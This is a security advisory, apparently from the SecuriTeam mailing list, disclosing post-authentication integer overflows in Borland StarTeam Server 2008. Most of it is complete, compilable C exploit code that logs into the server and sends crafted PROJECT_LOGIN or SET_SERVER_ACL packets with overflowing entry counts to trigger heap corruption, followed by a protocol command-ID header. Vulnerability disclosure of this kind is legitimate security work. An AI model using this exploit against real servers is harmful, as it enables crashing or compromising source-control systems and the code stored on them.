[NT] Borland StarTeam Server Multiple Integer Overflows

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Borland StarTeam Server Multiple Integer Overflows
------------------------------------------------------------------------


SUMMARY

<http://www.borland.com/starteam/> Borland StarTeam "is a fully
integrated, cost-effective software change and configuration management
tool, designed for both centralized and geographically distributed
software development environments." Multiple integer overflows have been
found in Borland's StarTeam server which allow remote attackers to cause
the product to execute arbitrary code.

DETAILS

Vulnerable Systems:
* Borland StarTeam server 2008 version 10.0.0.57

The server is affected by multiple integer overflow vulnerabilities caused
by the calculation of the amount of memory it needs to allocate for some
arrays received from the clients.

The main ways I have found for exploiting these vulnerabilities are
through the PROJECT_LOGIN and SET_SERVER_ACL commands where the 32 bit
number received from the client which specifies the amount of entries in
the packet is multiplicated respectively for 8 (or 4 depending by the
folder names or specifications) and 12, the result is then used for
allocating the memory without considering the 32 bit limit.

The effect of this operation is a heap overflow which allows an attacker
to control some registers and could exist a possibility of
executing malicious code.

For both the ways is necessary to have a valid account, privileges are not
necessary so the less privileged one is good too.

Exploit:
/*

by Luigi Auriemma - http://aluigi.altervista.org/poc/starteammpx.zip

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "show_dump.h"
#include "starteam.h"

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>

#define ONESEC 1
#endif

typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;



#define VER "0.1"
#define PORT 49201
#define BUFFSZ 0xff00 // max size



int put_starteam_password(u8 *data, u8 *str);
int fgetz(u8 *data, int size, FILE *fd);
int starteam_recv(int sd, u8 *data, int maxsz);
int tcp_recv(int sd, u8 *buff, int len);
int starteam_send(int sd, int id, u8 *data, int datalen);
int starteam_msg_hdr(u8 *data);
int starteam_pck_hdr(u8 *data, int len);
int starteam_id_hdr(u8 *data, int id);
int putcc(u8 *data, int chr, int len);
int putss(u8 *data, u8 *str);
int putmm(u8 *data, u8 *str, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



u8 client_id[16];



int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len,
attack;
u32 user_id;
u16 port = PORT;
u8 user[128],
pass[128], // no, you can't change the size of the password
*buff,
*p;

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

setbuf(stdout, NULL);

fputs("\n"
"Borland StarTeam <= 10.0.0.57 multiple post-auth integer
overflows "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@xxxxxxxxxxxxx\n"
"web: aluigi.org\n"
"\n", stdout);

if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> [port(%hu)]\n"
"\n"
"Attacks:\n"
" 1 = integer overflow in PROJECT_LOGIN (folder names list)\n"
" 2 = integer overflow in PROJECT_LOGIN (folder properties
list)\n"
" 3 = integer overflow in SET_SERVER_ACL\n"
"\n", argv[0], port);
exit(1);
}

attack = atoi(argv[1]);

if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr),
ntohs(peer.sin_port));

buff = malloc(BUFFSZ);
if(!buff) std_err();
memset(client_id, 0, sizeof(client_id));

printf("- insert the username you want to use: ");
fgetz(user, sizeof(user), stdin);
printf("- insert the right password: ");
fgetz(pass, sizeof(pass), stdin);

sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();

p = buff;
p += putxx(p, -1, 32);
starteam_send(sd, STARTEAM_SRVR_CMD_GET_SERVER_PARAMS, buff, p -
buff);
len = starteam_recv(sd, buff, BUFFSZ);
if(len < 0) goto quit;

p = buff;
p += putxx(p, -1, 32);
p += putcc(p, 0, 16);
p += putss(p, "workstation");
p += putss(p, "1.58");
p += putss(p, "en");
p += putss(p, "US");
p += putss(p, "");
p += putss(p, "client_string");
starteam_send(sd, STARTEAM_SRVR_CMD_SERVER_CONNECT, buff, p - buff);
len = starteam_recv(sd, buff, BUFFSZ);
if(len < 0) goto quit;
memcpy(client_id, buff, sizeof(client_id));

p = buff;
p += putxx(p, -1, 32);
starteam_send(sd, STARTEAM_SRVR_CMD_BEGIN_LOGIN, buff, p - buff);
len = starteam_recv(sd, buff, BUFFSZ);
if(len < 0) goto quit;
getxx(buff, &user_id, 32);

p = buff;
p += putxx(p, -1, 32);
starteam_send(sd, STARTEAM_SRVR_CMD_GET_REQUIRED_ENCRYPTION_LEVEL,
buff, p - buff);
len = starteam_recv(sd, buff, BUFFSZ);
if(len < 0) goto quit;

p = buff;
p += putxx(p, -1, 32);
p += putxx(p, user_id, 32);
p += putss(p, user);
p += put_starteam_password(p, pass);
p += putss(p, ""); // useless redundant username
p += putss(p, "");
starteam_send(sd, STARTEAM_SRVR_CMD_SERVER_LOGIN, buff, p - buff);
len = starteam_recv(sd, buff, BUFFSZ);
if(len < 0) goto quit;

if(!memcmp(buff + 4, "CStSecurity", 11)) {
printf("\nError: invalid username or password\n");
goto quit;
}

if((attack == 1) || (attack == 2)) {
p = buff;
p += putxx(p, -1, 32);
p += putmm(p, client_id, 16);
p += putss(p, "new project");
p += putxx(p, -1, 32);
p += putxx(p, 0, 32);
p += putxx(p, 1, 32);
p += putss(p, "project_description");
p += putxx(p, 0, 32);
p += putxx(p, 0, 32);
p += putxx(p, 0, 32);
p += putss(p, "local_path");
p += putxx(p, 0, 32);
p += putxx(p, 0, 32);
p += putxx(p, 0, 32);
if(attack == 1) {
p += putxx(p, (0xffffffff / 8) + 1, 32);
} else {
p += putxx(p, 0, 32);
p += putxx(p, (0xffffffff / 4) + 1, 32);
}
p += putcc(p, 'A', BUFFSZ - (p - buff));
starteam_send(sd, STARTEAM_SRVR_CMD_PROJECT_LOGIN, buff, p -
buff);

} else if(attack == 3) {
p = buff;
p += putxx(p, -1, 32);
p += putxx(p, (0xffffffff / 12) + 1, 32);
p += putcc(p, 'A', BUFFSZ - (p - buff));
starteam_send(sd, STARTEAM_SRVR_CMD_SET_SERVER_ACL, buff, p -
buff);

} else {
printf("\nError: wrong attack number\n");
exit(1);
}

len = starteam_recv(sd, buff, BUFFSZ);
if(len < 0) goto quit;

quit:
close(sd);
free(buff);
printf("- done\n");
return(0);
}



int put_starteam_password(u8 *data, u8 *pwd) {
int i,
len;
u8 encpwd[128];

strncpy(encpwd, pwd, sizeof(encpwd));
len = strlen(encpwd);
memset(encpwd + len, 0xff, sizeof(encpwd) - len);
putxx(data, sizeof(encpwd), 32);
for(i = 0; i < sizeof(encpwd); i++) {
data[4 + i] = encpwd[i] ^ len;
}
return(4 + sizeof(encpwd));
}



int fgetz(u8 *data, int size, FILE *fd) {
u8 *p;

fgets(data, size, fd);
for(p = data; *p && (*p != '\n') && (*p != '\r'); p++);
*p = 0;
return(p - data);
}



int starteam_recv(int sd, u8 *data, int maxsz) {
u32 len;
u8 pck_hdr[16];

if(tcp_recv(sd, pck_hdr, sizeof(pck_hdr)) < 0) return(-1);
getxx(pck_hdr + 4, &len, 32);
if(len > maxsz) {
printf("\nError: incoming packet is bigger than how much
supported\n");
exit(1);
}
if(tcp_recv(sd, data, len) < 0) return(-1);
show_dump(data, len, stdout);
return(len);
}



int tcp_recv(int sd, u8 *buff, int len) {
int t;
u8 *p;

for(p = buff; len; p += t, len -= t) {
if(timeout(sd, 3) < 0) return(-1);
t = recv(sd, p, len, 0);
if(t <= 0) return(-1);
}
return(0);
}



int starteam_send(int sd, int id, u8 *data, int datalen) {
int msg_hdr_len,
pck_hdr_len,
id_hdr_len;
u8 msg_hdr[20],
pck_hdr[16],
id_hdr[38];

msg_hdr_len = starteam_msg_hdr(msg_hdr);
id_hdr_len = starteam_id_hdr(id_hdr, id);
pck_hdr_len = starteam_pck_hdr(pck_hdr, id_hdr_len + datalen);

printf("- send packet %u\n", id);

if(send(sd, msg_hdr, msg_hdr_len, 0) != msg_hdr_len) return(-1);
if(send(sd, pck_hdr, pck_hdr_len, 0) != pck_hdr_len) return(-1);
if(send(sd, id_hdr, id_hdr_len, 0) != id_hdr_len) return(-1);
if(send(sd, data, datalen, 0) != datalen) return(-1);
return(0);
}



int starteam_msg_hdr(u8 *data) {
u8 *p;

p = data;
p += putxx(p, 0, 32); // session tag
p += putxx(p, 0, 32); // timestamp
p += putxx(p, 0x10000000, 32); // flags (|1 for zlib)
p += putxx(p, 0, 32); // key id
p += putxx(p, 0, 32); // reserved
return(p - data);
}



int starteam_pck_hdr(u8 *data, int len) {
u8 *p;

p = data;
p += putxx(p, 0x6e616c41, 32); // Alan
p += putxx(p, len, 32); // packet size
p += putxx(p, len, 32); // data size
p += putxx(p, 8, 32); // flags
return(p - data);
}



int starteam_id_hdr(u8 *data, int id) {
u8 *p;

p = data;
p += putxx(p, 100, 16); // revision level
p += putmm(p, client_id, 16); // client id
p += putxx(p, 0, 32); // connect ID
p += putxx(p, 0, 32); // component ID
p += putxx(p, id, 32); // command ID
p += putxx(p, 0, 32); // command time
p += putxx(p, 0, 32); // command user ID
return(p - data);
}



int putcc(u8 *data, int chr, int len) {
memset(data, chr, len);
return(len);
}



int putss(u8 *data, u8 *str) {
int len;

len = strlen(str);
putxx(data, len, 32);
memcpy(data + 4, str, len);
return(4 + len);
}



int putmm(u8 *data, u8 *str, int len) {
memcpy(data, str, len);
return(len);
}



int getxx(u8 *data, u32 *ret, int bits) {
u32 num;
int i,
bytes;

bytes = bits >> 3;
for(num = i = 0; i < bytes; i++) {
num |= (data[i] << (i << 3));
}
*ret = num;
return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
int i,
bytes;

bytes = bits >> 3;
for(i = 0; i < bytes; i++) {
data[i] = (num >> (i << 3)) & 0xff;
}
return(bytes);
}



int timeout(int sock, int secs) {
struct timeval tout;
fd_set fd_read;

tout.tv_sec = secs;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
if(select(sock + 1, &fd_read, NULL, NULL, &tout)
<= 0) return(-1);
return(0);
}



u32 resolv(char *host) {
struct hostent *hp;
u32 host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u32 *)hp->h_addr;
}
return(host_ip);
}



#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif

starteam.h:
// from Wireshark

#define STARTEAM_MAGIC 0x416C616E /* "Alan" */

#define STARTEAM_SRVR_CMD_GET_SESSION_TAG 1
#define STARTEAM_SRVR_CMD_GET_REQUIRED_ENCRYPTION_LEVEL 2
#define STARTEAM_SRVR_CMD_GET_SERVER_PARAMS 3
#define STARTEAM_SRVR_CMD_SERVER_CONNECT 4
#define STARTEAM_SRVR_CMD_SERVER_RECONNECT 5
#define STARTEAM_SRVR_CMD_BEGIN_LOGIN 10
#define STARTEAM_SRVR_CMD_KEY_EXCHANGE_PHASE0 11
#define STARTEAM_SRVR_CMD_KEY_EXCHANGE_PHASE12 12
#define STARTEAM_SRVR_CMD_KEY_EXCHANGE_PHASE3 13
#define STARTEAM_SRVR_CMD_SERVER_LOGIN 14
#define STARTEAM_SRVR_CMD_GET_PROJECT_LIST 1001
#define STARTEAM_SRVR_CMD_GET_PROJECT_VIEWS 1002
#define STARTEAM_SRVR_CMD_PROJECT_LOGIN 1011
#define STARTEAM_SRVR_CMD_PROJECT_LOGOUT 1013
#define STARTEAM_PROJ_CMD_LIST_SET_READ 1014
#define STARTEAM_PROJ_CMD_LIST_ADD_ATTACHMENT 1015
#define STARTEAM_PROJ_CMD_LIST_GET_ATTACHMENT 1016
#define STARTEAM_PROJ_CMD_LIST_REMOVE_ATTACHMENT 1017
#define STARTEAM_PROJ_CMD_MAIL_LIST_ITEMS 1018
#define STARTEAM_PROJ_CMD_LIST_ANY_NEWITEMS 1020
#define STARTEAM_PROJ_CMD_LIST_GET_NEWITEMS 1021
#define STARTEAM_SRVR_CMD_RELEASE_CLIENT 1021
#define STARTEAM_SRVR_CMD_UPDATE_SERVER_INFO 1022
#define STARTEAM_SRVR_CMD_GET_USAGE_DATA 1023
#define STARTEAM_SRVR_CMD_GET_LICENSE_INFO 1024
#define STARTEAM_PROJ_CMD_FILTER_ADD 1030
#define STARTEAM_PROJ_CMD_FILTER_MODIFY 1031
#define STARTEAM_PROJ_CMD_FILTER_GET 1032
#define STARTEAM_PROJ_CMD_FILTER_GET_LIST 1033
#define STARTEAM_PROJ_CMD_FILTER_DELETE 1034
#define STARTEAM_PROJ_CMD_QUERY_ADD 1035
#define STARTEAM_PROJ_CMD_QUERY_MODIFY 1036
#define STARTEAM_PROJ_CMD_QUERY_GET 1037
#define STARTEAM_PROJ_CMD_QUERY_GET_LIST 1038
#define STARTEAM_PROJ_CMD_QUERY_DELETE 1039
#define STARTEAM_PROJ_GET_FILTER_CLASS_ID 1040
#define STARTEAM_PROJ_GET_QUERY_CLASS_ID 1041
#define STARTEAM_SRVR_CMD_PROJECT_CREATE 1051
#define STARTEAM_SRVR_CMD_PROJECT_OPEN 1052
#define STARTEAM_SRVR_CMD_PROJECT_CLOSE 1053
#define STARTEAM_PROJ_CMD_CATALOG_LOADALL 1151
#define STARTEAM_PROJ_CMD_CATALOG_LOADSET 1152
#define STARTEAM_PROJ_CMD_CATALOG_LOADREGISTEREDCLASSES 1154
#define STARTEAM_PROJ_CMD_REFRESH_CLASS_INFO 1160
#define STARTEAM_PROJ_CMD_ADD_CUSTOM_FIELD_CLASS_INFO 1161
#define STARTEAM_PROJ_CMD_MODIFY_FIELD_CLASS_INFO 1162
#define STARTEAM_PROJ_CMD_ADD_CUSTOM_FIELD_CLASS_INFO_EX 1163
#define STARTEAM_PROJ_CMD_GET_FOLDER_ITEMS 2001
#define STARTEAM_SRVR_CMD_GET_USERS_AND_GROUPS 2001
#define STARTEAM_PROJ_CMD_REFRESH_ITEMS 2002
#define STARTEAM_PROJ_CMD_GET_ITEM 2003
#define STARTEAM_SRVR_CMD_GET_EMAIL_USERS 2003
#define STARTEAM_PROJ_CMD_UPDATE_ITEM 2004
#define STARTEAM_PROJ_CMD_DELETE_ITEM 2005
#define STARTEAM_PROJ_CMD_SET_ITEM_LOCK 2006
#define STARTEAM_PROJ_CMD_DELETE_TREE_ITEM 2007
#define STARTEAM_PROJ_CMD_GET_ITEM_HISTORY 2010
#define STARTEAM_SRVR_CMD_GET_USER_PERSONAL_INFO 2011
#define STARTEAM_SRVR_CMD_SET_USER_PERSONAL_INFO 2012
#define STARTEAM_SRVR_CMD_SET_USER_PASSWORD 2013
#define STARTEAM_PROJ_CMD_MOVE_ITEMS 2020
#define STARTEAM_PROJ_CMD_MOVE_TREE_ITEMS 2021
#define STARTEAM_SRVR_CMD_GET_GROUP_INFO 2021
#define STARTEAM_PROJ_CMD_SHARE_ITEMS 2022
#define STARTEAM_SRVR_CMD_ADD_EDIT_GROUP_INFO 2022
#define STARTEAM_PROJ_CMD_SHARE_TREE_ITEMS 2023
#define STARTEAM_SRVR_CMD_DROP_GROUP 2023
#define STARTEAM_SRVR_CMD_GET_USER_INFO 2024
#define STARTEAM_SRVR_CMD_ADD_EDIT_USER_INFO 2025
#define STARTEAM_SRVR_CMD_DROP_USER 2026
#define STARTEAM_SRVR_CMD_GET_MIN_PASSWORD_LENGTH 2027
#define STARTEAM_SRVR_CMD_USER_ADMIN_OPERATION 2028
#define STARTEAM_SRVR_CMD_ACCESS_CHECK 2029
#define STARTEAM_PROJ_CMD_GET_COMMON_ANCESTOR_ITEM 2030
#define STARTEAM_SRVR_CMD_ACCESS_TEST 2030
#define STARTEAM_PROJ_CMD_UPDATE_REVISION_COMMENT 2031
#define STARTEAM_SRVR_CMD_GET_MAIN_LOG_LAST64K 2031
#define STARTEAM_SRVR_CMD_GET_SERVER_CONFIG 2032
#define STARTEAM_SRVR_CMD_SET_SERVER_CONFIG 2033
#define STARTEAM_SRVR_CMD_GET_SERVER_ACL 2034
#define STARTEAM_SRVR_CMD_DROP_SERVER_ACL 2035
#define STARTEAM_SRVR_CMD_SET_SERVER_ACL 2036
#define STARTEAM_SRVR_CMD_GET_SYSTEM_POLICY 2037
#define STARTEAM_SRVR_CMD_SET_SYSTEM_POLICY 2038
#define STARTEAM_SRVR_CMD_GET_SECURITY_LOG 2039
#define STARTEAM_SRVR_CMD_GET_SERVER_COMMAND_STATS 2040
#define STARTEAM_SRVR_CMD_SET_SERVER_COMMAND_MODE 2041
#define STARTEAM_SRVR_CMD_SHUTDOWN 2042
#define STARTEAM_SRVR_CMD_RESTART 2043
#define STARTEAM_SRVR_CMD_GET_SERVER_COMMAND_MODE 2045
#define STARTEAM_SRVR_CMD_GET_LOG 2046
#define STARTEAM_SRVR_CMD_GET_COMPONENT_LIST 2050
#define STARTEAM_SRVR_CMD_GET_GROUP_MEMBERS 2060
#define STARTEAM_PROJ_CMD_GET_ITEMS_VERSIONS 5001
#define STARTEAM_SRVR_CMD_VALIDATE_VSS_INI_PATH 9034
#define STARTEAM_SRVR_CMD_VALIDATE_PVCS_CFG_PATH 9035
#define STARTEAM_SRVR_CMD_GET_VSS_PROJECT_TREE 9036
#define STARTEAM_SRVR_CMD_GET_ALL_PVCS_ARCHIVES 9037
#define STARTEAM_SRVR_CMD_INITIALIZE_FOREIGN_ACCESS 9038
#define STARTEAM_SRVR_CMD_SET_FOREIGN_PROJECT_PW 9039
#define STARTEAM_PROJ_CMD_PING 10001
#define STARTEAM_PROJ_CMD_SET_LOCALE 10005
#define STARTEAM_PROJ_CMD_GET_CONTAINER_ACL 10011
#define STARTEAM_PROJ_CMD_SET_CONTAINER_ACL 10012
#define STARTEAM_PROJ_CMD_GET_CONTAINER_LEVEL_ACL 10013
#define STARTEAM_PROJ_CMD_SET_CONTAINER_LEVEL_ACL 10014
#define STARTEAM_PROJ_CMD_GET_OBJECT_ACL 10015
#define STARTEAM_PROJ_CMD_SET_OBJECT_ACL 10016
#define STARTEAM_PROJ_CMD_ITEM_ACCESS_CHECK 10017
#define STARTEAM_PROJ_CMD_ITEM_ACCESS_TEST 10018
#define STARTEAM_PROJ_CMD_GET_OWNER 10019
#define STARTEAM_PROJ_CMD_ACQUIRE_OWNERSHIP 10020
#define STARTEAM_PROJ_CMD_GET_FOLDERS 10021
#define STARTEAM_PROJ_CMD_ADD_FOLDERS 10023
#define STARTEAM_PROJ_CMD_DELETE_FOLDER 10024
#define STARTEAM_PROJ_CMD_MOVE_FOLDER 10025
#define STARTEAM_PROJ_CMD_SHARE_FOLDER 10026
#define STARTEAM_PROJ_CMD_CONTAINER_ACCESS_CHECK 10031
#define STARTEAM_PROJ_CMD_CONTAINER_ACCESS_TEST 10032
#define STARTEAM_PROJ_CMD_GET_OBJECT2_ACL 10035
#define STARTEAM_PROJ_CMD_SET_OBJECT2_ACL 10036
#define STARTEAM_PROJ_CMD_OBJECT_ACCESS_CHECK 10037
#define STARTEAM_PROJ_CMD_OBJECT_ACCESS_TEST 10038
#define STARTEAM_PROJ_CMD_GET_OBJECT_OWNER 10039
#define STARTEAM_PROJ_CMD_ACQUIRE_OBJECT_OWNERSHIP 10040
#define STARTEAM_PROJ_CMD_GET_FOLDER_PROPERTIES 10053
#define STARTEAM_PROJ_CMD_SET_FOLDER_PROPERTIES 10054
#define STARTEAM_PROJ_CMD_GET_ITEM_PROPERTIES 10060
#define STARTEAM_PROJ_CMD_SET_ITEM_PROPERTIES 10061
#define STARTEAM_PROJ_CMD_GET_ITEM_REFERENCES 10062
#define STARTEAM_PROJ_CMD_GET_ITEM_REFERENCE 10063
#define STARTEAM_PROJ_CMD_GET_ITEM_REVISIONS 10065
#define STARTEAM_PROJ_CMD_DELETE_PROJECT 10083
#define STARTEAM_PROJ_CMD_GET_PROJECT_PROPERTIES 10085
#define STARTEAM_PROJ_CMD_SET_PROJECT_PROPERTIES 10086
#define STARTEAM_PROJ_CMD_GET_VIEW_INFO 10090
#define STARTEAM_PROJ_CMD_ADD_VIEW 10091
#define STARTEAM_PROJ_CMD_GET_VIEWS 10092
#define STARTEAM_PROJ_CMD_GET_VIEW_PROPERTIES 10093
#define STARTEAM_PROJ_CMD_SET_VIEW_PROPERTIES 10094
#define STARTEAM_PROJ_CMD_DELETE_VIEW 10095
#define STARTEAM_PROJ_CMD_SWITCH_VIEW 10098
#define STARTEAM_PROJ_CMD_SWITCH_VIEW_CONFIG 10099
#define STARTEAM_PROJ_CMD_GET_FOLDER_PATH 10100
#define STARTEAM_FILE_CMD_CHECKOUT 10104
#define STARTEAM_FILE_CMD_GET_SYNC_INFO 10111
#define STARTEAM_FILE_CMD_DELETE_SYNC_INFO 10112
#define STARTEAM_FILE_CMD_GET_PATH_IDS 10117
#define STARTEAM_FILE_CMD_SYNC_UPDATE_ALL_INFO 10119
#define STARTEAM_FILE_CMD_RESYNC_FILE 10121
#define STARTEAM_FILE_CMD_CONVERT_ARCHIVE 10122
#define STARTEAM_FILE_CMD_ARCHIVE_CONVERSION 10123
#define STARTEAM_FILE_CMD_READ_PVCS_ARCHIVES 10130
#define STARTEAM_FILE_CMD_ADD_PVCS_ARCHIVES 10131
#define STARTEAM_FILE_CMD_ADD_PVCS_BRANCHES 10132
#define STARTEAM_FILE_CMD_FINISH_NEW_PVCS_PROJECT 10133
#define STARTEAM_FILE_CMD_GET_NUMBER_VSS_ARCHIVES 10134
#define STARTEAM_FILE_CMD_READ_VSS_ARCHIVES 10135
#define STARTEAM_FILE_CMD_ADD_VSS_ARCHIVE_TO_FOLDER 10136
#define STARTEAM_FILE_CMD_FINISH_NEW_VSS_PROJECT 10137
#define STARTEAM_FILE_CMD_REFRESH_FOREIGN_FOLDER 10138
#define STARTEAM_FILE_CMD_START_GO_NATIVE 10139
#define STARTEAM_FILE_CMD_GET_PROJECT_TYPE 10141
#define STARTEAM_FILE_CMD_SET_FOREIGN_PROJECT_PW 10142
#define STARTEAM_FILE_CMD_INTERNAL_NESTED_COMMAND 10143
#define STARTEAM_PROJ_CMD_LABEL_GET_INFO 10201
#define STARTEAM_PROJ_CMD_LABEL_GET_PROPERTIES 10202
#define STARTEAM_PROJ_CMD_LABEL_SET_PROPERTIES 10203
#define STARTEAM_PROJ_CMD_LABEL_CREATE 10205
#define STARTEAM_PROJ_CMD_LABEL_DELETE 10206
#define STARTEAM_PROJ_CMD_LABEL_ATTACH 10207
#define STARTEAM_PROJ_CMD_LABEL_MOVE 10208
#define STARTEAM_PROJ_CMD_LABEL_DETACH 10209
#define STARTEAM_PROJ_CMD_LABEL_GET_INFO_EX 10221
#define STARTEAM_PROJ_CMD_LABEL_CREATE_EX 10222
#define STARTEAM_PROJ_CMD_LABEL_ATTACH_EX 10223
#define STARTEAM_PROJ_CMD_LABEL_ATTACH_ITEMS 10224
#define STARTEAM_PROJ_CMD_LABEL_DETACH_EX 10225
#define STARTEAM_PROJ_CMD_LABEL_DETACH_ITEMS 10226
#define STARTEAM_PROJ_CMD_LABEL_GETITEMIDS 10229
#define STARTEAM_PROJ_CMD_LINK_GET_INFO 10300
#define STARTEAM_PROJ_CMD_LINK_CREATE 10301
#define STARTEAM_PROJ_CMD_LINK_DELETE 10302
#define STARTEAM_PROJ_CMD_LINK_UPDATE_PROPERTIES 10310
#define STARTEAM_PROJ_CMD_LINK_UPDATE_PINS 10311
#define STARTEAM_PROJ_CMD_PROMOTION_GET 10400
#define STARTEAM_PROJ_CMD_PROMOTION_SET 10401
#define STARTEAM_TASK_CMD_GET_WORKRECS 10402
#define STARTEAM_TASK_CMD_ADD_WORKREC 10403
#define STARTEAM_TASK_CMD_UPDATE_WORKREC 10404
#define STARTEAM_TASK_CMD_DELETE_WORKREC 10405
#define STARTEAM_TASK_CMD_DELETE_TASK_PREDECESSOR 10408
#define STARTEAM_TASK_CMD_GET_TASK_DEPENDENCIES 10409
#define STARTEAM_TASK_CMD_ADD_TASK_PREDECESSOR 10410
#define STARTEAM_TASK_CMD_UPDATE_TASK_PREDECESSOR 10411
#define STARTEAM_PROJ_CMD_VIEW_COMPARE_GET_FOLDER_DETAILS 20070
#define STARTEAM_PROJ_CMD_VIEW_COMPARE_RELATE_ITEMS 20071


ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/starteammpx-adv.txt>
http://aluigi.altervista.org/adv/starteammpx-adv.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages